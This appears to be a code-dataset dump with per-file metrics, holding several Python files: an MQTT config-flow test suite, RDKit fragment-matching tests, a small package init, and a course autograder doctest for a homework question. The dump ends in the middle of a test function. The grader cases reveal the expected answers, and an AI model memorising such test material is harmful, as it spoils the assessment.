2021-12-22T11:25:51.000Z
|
def foo():
if 1:
if 2:
pass
| 10.4
| 16
| 0.307692
| 7
| 52
| 2.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 0.596154
| 52
| 4
| 17
| 13
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0
| 0
| 0.25
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
29b6acac421dacea89b81b4e043fec7633dfe01e
| 42
|
py
|
Python
|
hn_rank/__init__.py
|
RhettTrickett/hacker-news-rank
|
58ec0d27c3f4fe04468b76257d1371383973241a
|
[
"MIT"
] | 6
|
2018-06-20T07:47:01.000Z
|
2021-06-22T06:17:59.000Z
|
hn_rank/__init__.py
|
RhettTrickett/hacker-news-rank
|
58ec0d27c3f4fe04468b76257d1371383973241a
|
[
"MIT"
] | 1
|
2018-08-07T07:06:45.000Z
|
2018-08-07T07:06:45.000Z
|
hn_rank/__init__.py
|
RhettTrickett/hacker-news-rank
|
58ec0d27c3f4fe04468b76257d1371383973241a
|
[
"MIT"
] | 2
|
2018-06-22T08:22:24.000Z
|
2018-08-03T16:39:48.000Z
|
from .core import rank_urls, rank_articles
| 42
| 42
| 0.857143
| 7
| 42
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
29d8872c736a0dcda922161991ea9ae31d4acdcc
| 795
|
py
|
Python
|
hw/hw01/tests/q4c.py
|
surajrampure/data-94-sp21
|
074543103579c28d796c681f78f3c38449825328
|
[
"BSD-3-Clause"
] | 1
|
2020-11-21T09:42:52.000Z
|
2020-11-21T09:42:52.000Z
|
hw/hw01/tests/q4c.py
|
surajrampure/data-94-sp21
|
074543103579c28d796c681f78f3c38449825328
|
[
"BSD-3-Clause"
] | null | null | null |
hw/hw01/tests/q4c.py
|
surajrampure/data-94-sp21
|
074543103579c28d796c681f78f3c38449825328
|
[
"BSD-3-Clause"
] | null | null | null |
test = { 'name': 'q4c',
'points': 1,
'suites': [ { 'cases': [ {'code': ">>> is_valid_november_2020_sweden('Sweden', '2020-11-04')\nTrue", 'hidden': False, 'locked': False},
{'code': ">>> not is_valid_november_2020_sweden('sweden', '2020-11-04')\nTrue", 'hidden': False, 'locked': False},
{'code': ">>> not is_valid_november_2020_sweden('Sweden', '2020-11-302')\nTrue", 'hidden': False, 'locked': False},
{'code': ">>> not is_valid_november_2020_sweden('Sweden', '2019-11-24')\nTrue", 'hidden': False, 'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
| 72.272727
| 150
| 0.464151
| 76
| 795
| 4.644737
| 0.381579
| 0.07932
| 0.169972
| 0.215297
| 0.779037
| 0.70255
| 0.70255
| 0.70255
| 0.70255
| 0.70255
| 0
| 0.096045
| 0.332075
| 795
| 10
| 151
| 79.5
| 0.568738
| 0
| 0
| 0
| 0
| 0
| 0.481761
| 0.196226
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d9aab02e821fe150f86ce60a9dccf96ee23acedc
| 21,154
|
py
|
Python
|
tests/components/mqtt/test_config_flow.py
|
jaspervanheuven/core
|
58c00da8a046e65ec0744426b3e2aa613249e9d9
|
[
"Apache-2.0"
] | 3
|
2020-11-27T06:26:27.000Z
|
2020-12-09T14:55:16.000Z
|
tests/components/mqtt/test_config_flow.py
|
jaspervanheuven/core
|
58c00da8a046e65ec0744426b3e2aa613249e9d9
|
[
"Apache-2.0"
] | 13
|
2021-12-16T06:18:53.000Z
|
2022-03-31T06:26:03.000Z
|
tests/components/mqtt/test_config_flow.py
|
jaspervanheuven/core
|
58c00da8a046e65ec0744426b3e2aa613249e9d9
|
[
"Apache-2.0"
] | 1
|
2020-12-09T14:55:21.000Z
|
2020-12-09T14:55:21.000Z
|
"""Test config flow."""
from unittest.mock import patch
import pytest
import voluptuous as vol
from homeassistant import config_entries, data_entry_flow
from homeassistant.components import mqtt
from homeassistant.components.hassio import HassioServiceInfo
from homeassistant.core import HomeAssistant
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry
@pytest.fixture(autouse=True)
def mock_finish_setup():
"""Mock out the finish setup method."""
with patch(
"homeassistant.components.mqtt.MQTT.async_connect", return_value=True
) as mock_finish:
yield mock_finish
@pytest.fixture
def mock_try_connection():
"""Mock the try connection method."""
with patch("homeassistant.components.mqtt.config_flow.try_connection") as mock_try:
yield mock_try
@pytest.fixture
def mock_try_connection_success():
"""Mock the try connection method with success."""
def loop_start():
"""Simulate connect on loop start."""
mock_client().on_connect(mock_client, None, None, 0)
with patch("paho.mqtt.client.Client") as mock_client:
mock_client().loop_start = loop_start
yield mock_client()
@pytest.fixture
def mock_try_connection_time_out():
"""Mock the try connection method with a time out."""
# Patch prevent waiting 5 sec for a timeout
with patch("paho.mqtt.client.Client") as mock_client, patch(
"homeassistant.components.mqtt.config_flow.MQTT_TIMEOUT", 0
):
mock_client().loop_start = lambda *args: 1
yield mock_client()
async def test_user_connection_works(
hass, mock_try_connection, mock_finish_setup, mqtt_client_mock
):
"""Test we can finish a config flow."""
mock_try_connection.return_value = True
result = await hass.config_entries.flow.async_init(
"mqtt", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"broker": "127.0.0.1"}
)
assert result["type"] == "create_entry"
assert result["result"].data == {
"broker": "127.0.0.1",
"port": 1883,
"discovery": True,
}
# Check we tried the connection
assert len(mock_try_connection.mock_calls) == 1
# Check config entry got setup
assert len(mock_finish_setup.mock_calls) == 1
async def test_user_connection_fails(
hass, mock_try_connection_time_out, mock_finish_setup
):
"""Test if connection cannot be made."""
result = await hass.config_entries.flow.async_init(
"mqtt", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"broker": "127.0.0.1"}
)
assert result["type"] == "form"
assert result["errors"]["base"] == "cannot_connect"
# Check we tried the connection
assert len(mock_try_connection_time_out.mock_calls)
# Check config entry did not setup
assert len(mock_finish_setup.mock_calls) == 0
async def test_manual_config_starts_discovery_flow(
hass, mock_try_connection, mock_finish_setup, mqtt_client_mock
):
"""Test manual config initiates a discovery flow."""
# No flows in progress
assert hass.config_entries.flow.async_progress() == []
# MQTT config present in yaml config
assert await async_setup_component(hass, "mqtt", {"mqtt": {}})
await hass.async_block_till_done()
assert len(mock_finish_setup.mock_calls) == 0
# There should now be a discovery flow
flows = hass.config_entries.flow.async_progress()
assert len(flows) == 1
assert flows[0]["context"]["source"] == "integration_discovery"
assert flows[0]["handler"] == "mqtt"
assert flows[0]["step_id"] == "broker"
async def test_manual_config_set(
hass, mock_try_connection, mock_finish_setup, mqtt_client_mock
):
"""Test manual config does not create an entry, and entry can be setup late."""
# MQTT config present in yaml config
assert await async_setup_component(hass, "mqtt", {"mqtt": {"broker": "bla"}})
await hass.async_block_till_done()
assert len(mock_finish_setup.mock_calls) == 0
mock_try_connection.return_value = True
# Start config flow
result = await hass.config_entries.flow.async_init(
"mqtt", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"broker": "127.0.0.1"}
)
assert result["type"] == "create_entry"
assert result["result"].data == {
"broker": "127.0.0.1",
"port": 1883,
"discovery": True,
}
# Check we tried the connection, with precedence for config entry settings
mock_try_connection.assert_called_once_with("127.0.0.1", 1883, None, None)
# Check config entry got setup
assert len(mock_finish_setup.mock_calls) == 1
async def test_user_single_instance(hass):
"""Test we only allow a single config flow."""
MockConfigEntry(domain="mqtt").add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
"mqtt", context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "abort"
assert result["reason"] == "single_instance_allowed"
async def test_hassio_already_configured(hass):
"""Test we only allow a single config flow."""
MockConfigEntry(domain="mqtt").add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
"mqtt", context={"source": config_entries.SOURCE_HASSIO}
)
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
async def test_hassio_ignored(hass: HomeAssistant) -> None:
"""Test we supervisor discovered instance can be ignored."""
MockConfigEntry(
domain=mqtt.DOMAIN, source=config_entries.SOURCE_IGNORE
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
mqtt.DOMAIN,
data=HassioServiceInfo(
config={
"addon": "Mosquitto",
"host": "mock-mosquitto",
"port": "1883",
"protocol": "3.1.1",
}
),
context={"source": config_entries.SOURCE_HASSIO},
)
assert result
assert result.get("type") == data_entry_flow.RESULT_TYPE_ABORT
assert result.get("reason") == "already_configured"
async def test_hassio_confirm(hass, mock_try_connection_success, mock_finish_setup):
"""Test we can finish a config flow."""
mock_try_connection.return_value = True
result = await hass.config_entries.flow.async_init(
"mqtt",
data=HassioServiceInfo(
config={
"addon": "Mock Addon",
"host": "mock-broker",
"port": 1883,
"username": "mock-user",
"password": "mock-pass",
"protocol": "3.1.1",
}
),
context={"source": config_entries.SOURCE_HASSIO},
)
assert result["type"] == "form"
assert result["step_id"] == "hassio_confirm"
assert result["description_placeholders"] == {"addon": "Mock Addon"}
mock_try_connection_success.reset_mock()
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {"discovery": True}
)
assert result["type"] == "create_entry"
assert result["result"].data == {
"broker": "mock-broker",
"port": 1883,
"username": "mock-user",
"password": "mock-pass",
"protocol": "3.1.1",
"discovery": True,
}
# Check we tried the connection
assert len(mock_try_connection_success.mock_calls)
# Check config entry got setup
assert len(mock_finish_setup.mock_calls) == 1
async def test_option_flow(hass, mqtt_mock, mock_try_connection):
"""Test config flow options."""
mock_try_connection.return_value = True
config_entry = hass.config_entries.async_entries(mqtt.DOMAIN)[0]
config_entry.data = {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
mqtt_mock.async_connect.reset_mock()
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "broker"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
mqtt.CONF_BROKER: "another-broker",
mqtt.CONF_PORT: 2345,
mqtt.CONF_USERNAME: "user",
mqtt.CONF_PASSWORD: "pass",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "options"
await hass.async_block_till_done()
assert mqtt_mock.async_connect.call_count == 0
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
mqtt.CONF_DISCOVERY: True,
"birth_enable": True,
"birth_topic": "ha_state/online",
"birth_payload": "online",
"birth_qos": 1,
"birth_retain": True,
"will_enable": True,
"will_topic": "ha_state/offline",
"will_payload": "offline",
"will_qos": 2,
"will_retain": True,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["data"] is None
assert config_entry.data == {
mqtt.CONF_BROKER: "another-broker",
mqtt.CONF_PORT: 2345,
mqtt.CONF_USERNAME: "user",
mqtt.CONF_PASSWORD: "pass",
mqtt.CONF_DISCOVERY: True,
mqtt.CONF_BIRTH_MESSAGE: {
mqtt.ATTR_TOPIC: "ha_state/online",
mqtt.ATTR_PAYLOAD: "online",
mqtt.ATTR_QOS: 1,
mqtt.ATTR_RETAIN: True,
},
mqtt.CONF_WILL_MESSAGE: {
mqtt.ATTR_TOPIC: "ha_state/offline",
mqtt.ATTR_PAYLOAD: "offline",
mqtt.ATTR_QOS: 2,
mqtt.ATTR_RETAIN: True,
},
}
await hass.async_block_till_done()
assert mqtt_mock.async_connect.call_count == 1
async def test_disable_birth_will(hass, mqtt_mock, mock_try_connection):
"""Test disabling birth and will."""
mock_try_connection.return_value = True
config_entry = hass.config_entries.async_entries(mqtt.DOMAIN)[0]
config_entry.data = {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
mqtt_mock.async_connect.reset_mock()
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "broker"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
mqtt.CONF_BROKER: "another-broker",
mqtt.CONF_PORT: 2345,
mqtt.CONF_USERNAME: "user",
mqtt.CONF_PASSWORD: "pass",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "options"
await hass.async_block_till_done()
assert mqtt_mock.async_connect.call_count == 0
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
mqtt.CONF_DISCOVERY: True,
"birth_enable": False,
"birth_topic": "ha_state/online",
"birth_payload": "online",
"birth_qos": 1,
"birth_retain": True,
"will_enable": False,
"will_topic": "ha_state/offline",
"will_payload": "offline",
"will_qos": 2,
"will_retain": True,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["data"] is None
assert config_entry.data == {
mqtt.CONF_BROKER: "another-broker",
mqtt.CONF_PORT: 2345,
mqtt.CONF_USERNAME: "user",
mqtt.CONF_PASSWORD: "pass",
mqtt.CONF_DISCOVERY: True,
mqtt.CONF_BIRTH_MESSAGE: {},
mqtt.CONF_WILL_MESSAGE: {},
}
await hass.async_block_till_done()
assert mqtt_mock.async_connect.call_count == 1
def get_default(schema, key):
"""Get default value for key in voluptuous schema."""
for k in schema.keys():
if k == key:
if k.default == vol.UNDEFINED:
return None
return k.default()
def get_suggested(schema, key):
"""Get suggested value for key in voluptuous schema."""
for k in schema.keys():
if k == key:
if k.description is None or "suggested_value" not in k.description:
return None
return k.description["suggested_value"]
async def test_option_flow_default_suggested_values(
hass, mqtt_mock, mock_try_connection_success
):
"""Test config flow options has default/suggested values."""
config_entry = hass.config_entries.async_entries(mqtt.DOMAIN)[0]
config_entry.data = {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
mqtt.CONF_USERNAME: "user",
mqtt.CONF_PASSWORD: "pass",
mqtt.CONF_DISCOVERY: True,
mqtt.CONF_BIRTH_MESSAGE: {
mqtt.ATTR_TOPIC: "ha_state/online",
mqtt.ATTR_PAYLOAD: "online",
mqtt.ATTR_QOS: 1,
mqtt.ATTR_RETAIN: True,
},
mqtt.CONF_WILL_MESSAGE: {
mqtt.ATTR_TOPIC: "ha_state/offline",
mqtt.ATTR_PAYLOAD: "offline",
mqtt.ATTR_QOS: 2,
mqtt.ATTR_RETAIN: False,
},
}
# Test default/suggested values from config
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "broker"
defaults = {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
suggested = {
mqtt.CONF_USERNAME: "user",
mqtt.CONF_PASSWORD: "pass",
}
for k, v in defaults.items():
assert get_default(result["data_schema"].schema, k) == v
for k, v in suggested.items():
assert get_suggested(result["data_schema"].schema, k) == v
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
mqtt.CONF_BROKER: "another-broker",
mqtt.CONF_PORT: 2345,
mqtt.CONF_USERNAME: "us3r",
mqtt.CONF_PASSWORD: "p4ss",
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "options"
defaults = {
mqtt.CONF_DISCOVERY: True,
"birth_qos": 1,
"birth_retain": True,
"will_qos": 2,
"will_retain": False,
}
suggested = {
"birth_topic": "ha_state/online",
"birth_payload": "online",
"will_topic": "ha_state/offline",
"will_payload": "offline",
}
for k, v in defaults.items():
assert get_default(result["data_schema"].schema, k) == v
for k, v in suggested.items():
assert get_suggested(result["data_schema"].schema, k) == v
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
mqtt.CONF_DISCOVERY: False,
"birth_topic": "ha_state/onl1ne",
"birth_payload": "onl1ne",
"birth_qos": 2,
"birth_retain": False,
"will_topic": "ha_state/offl1ne",
"will_payload": "offl1ne",
"will_qos": 1,
"will_retain": True,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
# Test updated default/suggested values from config
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "broker"
defaults = {
mqtt.CONF_BROKER: "another-broker",
mqtt.CONF_PORT: 2345,
}
suggested = {
mqtt.CONF_USERNAME: "us3r",
mqtt.CONF_PASSWORD: "p4ss",
}
for k, v in defaults.items():
assert get_default(result["data_schema"].schema, k) == v
for k, v in suggested.items():
assert get_suggested(result["data_schema"].schema, k) == v
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={mqtt.CONF_BROKER: "another-broker", mqtt.CONF_PORT: 2345},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "options"
defaults = {
mqtt.CONF_DISCOVERY: False,
"birth_qos": 2,
"birth_retain": False,
"will_qos": 1,
"will_retain": True,
}
suggested = {
"birth_topic": "ha_state/onl1ne",
"birth_payload": "onl1ne",
"will_topic": "ha_state/offl1ne",
"will_payload": "offl1ne",
}
for k, v in defaults.items():
assert get_default(result["data_schema"].schema, k) == v
for k, v in suggested.items():
assert get_suggested(result["data_schema"].schema, k) == v
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={
mqtt.CONF_DISCOVERY: True,
"birth_topic": "ha_state/onl1ne",
"birth_payload": "onl1ne",
"birth_qos": 2,
"birth_retain": False,
"will_topic": "ha_state/offl1ne",
"will_payload": "offl1ne",
"will_qos": 1,
"will_retain": True,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
# Make sure all MQTT related jobs are done before ending the test
await hass.async_block_till_done()
async def test_options_user_connection_fails(hass, mock_try_connection_time_out):
"""Test if connection cannot be made."""
config_entry = MockConfigEntry(domain=mqtt.DOMAIN)
config_entry.add_to_hass(hass)
config_entry.data = {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == "form"
mock_try_connection_time_out.reset_mock()
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={mqtt.CONF_BROKER: "bad-broker", mqtt.CONF_PORT: 2345},
)
assert result["type"] == "form"
assert result["errors"]["base"] == "cannot_connect"
# Check we tried the connection
assert len(mock_try_connection_time_out.mock_calls)
# Check config entry did not update
assert config_entry.data == {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
async def test_options_bad_birth_message_fails(hass, mock_try_connection):
"""Test bad birth message."""
config_entry = MockConfigEntry(domain=mqtt.DOMAIN)
config_entry.add_to_hass(hass)
config_entry.data = {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
mock_try_connection.return_value = True
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == "form"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={mqtt.CONF_BROKER: "another-broker", mqtt.CONF_PORT: 2345},
)
assert result["type"] == "form"
assert result["step_id"] == "options"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={"birth_topic": "ha_state/online/#"},
)
assert result["type"] == "form"
assert result["errors"]["base"] == "bad_birth"
# Check config entry did not update
assert config_entry.data == {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
async def test_options_bad_will_message_fails(hass, mock_try_connection):
"""Test bad will message."""
config_entry = MockConfigEntry(domain=mqtt.DOMAIN)
config_entry.add_to_hass(hass)
config_entry.data = {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
mock_try_connection.return_value = True
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == "form"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={mqtt.CONF_BROKER: "another-broker", mqtt.CONF_PORT: 2345},
)
assert result["type"] == "form"
assert result["step_id"] == "options"
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={"will_topic": "ha_state/offline/#"},
)
assert result["type"] == "form"
assert result["errors"]["base"] == "bad_will"
# Check config entry did not update
assert config_entry.data == {
mqtt.CONF_BROKER: "test-broker",
mqtt.CONF_PORT: 1234,
}
| 32.796899
| 87
| 0.639217
| 2,603
| 21,154
| 4.934307
| 0.080292
| 0.044223
| 0.047649
| 0.050685
| 0.837667
| 0.813999
| 0.768608
| 0.748832
| 0.716988
| 0.689583
| 0
| 0.012625
| 0.239907
| 21,154
| 644
| 88
| 32.847826
| 0.786181
| 0.050392
| 0
| 0.693837
| 0
| 0
| 0.145037
| 0.014019
| 0
| 0
| 0
| 0
| 0.180915
| 1
| 0.013917
| false
| 0.019881
| 0.017893
| 0
| 0.039761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a4f64a79aa752959f3d9d5cee719ec3631adea7
| 12,902
|
py
|
Python
|
pgradd/tests/test_RINGparser_RDkitwrapper_test.py
|
VlachosGroup/PythonGroupAdditivity
|
114218addd528ebec82655edf4ca0d2d125d3543
|
[
"MIT"
] | 2
|
2019-09-20T22:02:52.000Z
|
2022-03-07T10:53:20.000Z
|
pgradd/tests/test_RINGparser_RDkitwrapper_test.py
|
VlachosGroup/PythonGroupAdditivity
|
114218addd528ebec82655edf4ca0d2d125d3543
|
[
"MIT"
] | 10
|
2019-06-12T18:31:48.000Z
|
2021-11-17T17:53:57.000Z
|
pgradd/tests/test_RINGparser_RDkitwrapper_test.py
|
VlachosGroup/PythonGroupAdditivity
|
114218addd528ebec82655edf4ca0d2d125d3543
|
[
"MIT"
] | 2
|
2019-11-20T10:29:02.000Z
|
2020-06-02T08:08:18.000Z
|
# -*- coding: utf-8 -*-
from pgradd.RINGParser.Reader import Read
from rdkit import Chem
import unittest
class TestRINGParser(unittest.TestCase):
def test_molquery(self):
testmol = Chem.MolFromSmiles('CCC')
s = """
fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((1, 0), (0, 1), (1, 2), (2, 1))))
def test_double_triple_bond(self):
testmol = Chem.MolFromSmiles('C=C-C#C')
s = """
fragment a{
C labeled c1
C labeled c2 double bond to c1
C labeled c3 single bond to c2
C labeled c4 triple bond to c3
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1, 2, 3),)))
def test_aromatic_bond(self):
testmol = Chem.MolFromSmiles('c1ccccc1')
s = """
fragment a{
C labeled c1
C labeled c2 aromatic bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (0, 5), (1, 0), (1, 2), (2, 1),
(2, 3), (3, 2), (3, 4), (4, 3), (4, 5),
(5, 4), (5, 0))))
def test_ring_bond1(self):
testmol = Chem.MolFromSmiles('CCC1CCC1')
s = """
fragment a{
C labeled c1
C labeled c2 ring bond to c1
C labeled c3 ring bond to c2
C labeled c4 ring bond to c3
ringbond c4 ring bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((2, 3, 4, 5), (2, 5, 4, 3),
(3, 2, 5, 4), (3, 4, 5, 2),
(4, 3, 2, 5), (4, 5, 2, 3),
(5, 2, 3, 4), (5, 4, 3, 2))))
def test_ring_bond2(self):
testmol = Chem.MolFromSmiles('CCC1CCC1')
s = """
fragment a{
C labeled c1
C labeled c2 ring bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((2, 3), (2, 5), (3, 2), (3, 4), (4, 3),
(4, 5), (5, 4), (5, 2))))
def test_non_ring_bond(self):
testmol = Chem.MolFromSmiles('CCC1CCC1')
s = """
fragment a{
C labeled c1
C labeled c2 nonring bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
def test_any_bond1(self):
testmol = Chem.MolFromSmiles('CC=CC#C')
s = """
fragment a{
C labeled c1
C labeled c2 any bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (1, 0), (1, 2), (2, 1),
(2, 3), (3, 2), (3, 4), (4, 3))))
def test_any_bond2(self):
testmol = Chem.MolFromSmiles('CC=CC#C')
s = """
fragment a{
C labeled c1
C labeled c2 any bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (1, 0), (1, 2), (2, 1),
(2, 3), (3, 2), (3, 4), (4, 3))))
def test_strong_bond(self):
testmol = Chem.MolFromSmiles('CC=CC#C')
s = """
fragment a{
C labeled c1
C labeled c2 strong bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((1, 2), (2, 1), (3, 4), (4, 3))))
def test_other_bond1(self):
testmol = Chem.MolFromSmiles('C[CH2-]')
s = """
positive fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertEqual(match_index, ())
def test_other_bond2(self):
testmol = Chem.MolFromSmiles('C[CH2+]')
s = """
negative fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertEqual(match_index, ())
def test_other_bond3(self):
testmol = Chem.MolFromSmiles('C=CC')
s = """
olefinic fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((1, 2), (2, 1))))
def test_other_bond4(self):
testmol = Chem.MolFromSmiles('C=CC')
s = """
paraffinic fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertEqual(match_index, ())
def test_other_bond5(self):
testmol = Chem.MolFromSmiles('CCC')
s = """
paraffinic fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
def test_other_bond6(self):
testmol = Chem.MolFromSmiles('CCC')
s = """
linear fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
def test_other_bond7(self):
testmol = Chem.MolFromSmiles('CCC')
s = """
cyclic fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertEqual(match_index, ())
def test_other_bond8(self):
testmol = Chem.MolFromSmiles('C1CCC1C')
s = """
cyclic fragment a{
C labeled c1
C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (0, 3), (1, 0), (1, 2),
(2, 1), (2, 3), (3, 2),
(3, 4), (3, 0), (4, 3))))
def test_symbol_atomsuffix(self):
testmol = Chem.MolFromSmiles('CCC')
s = """
fragment a{
$ labeled c1
$ labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (0, 3), (0, 4), (0, 5), (1, 0),
(1, 2), (1, 6), (1, 7), (2, 1), (2, 8),
(2, 9), (2, 10), (3, 0), (4, 0),
(5, 0), (6, 1), (7, 1), (8, 2), (9, 2),
(10, 2))))
def test_other_bond9(self):
testmol = Chem.MolFromSmiles('CCO')
s = """
fragment a{
X labeled c1
X labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
def test_other_bond10(self):
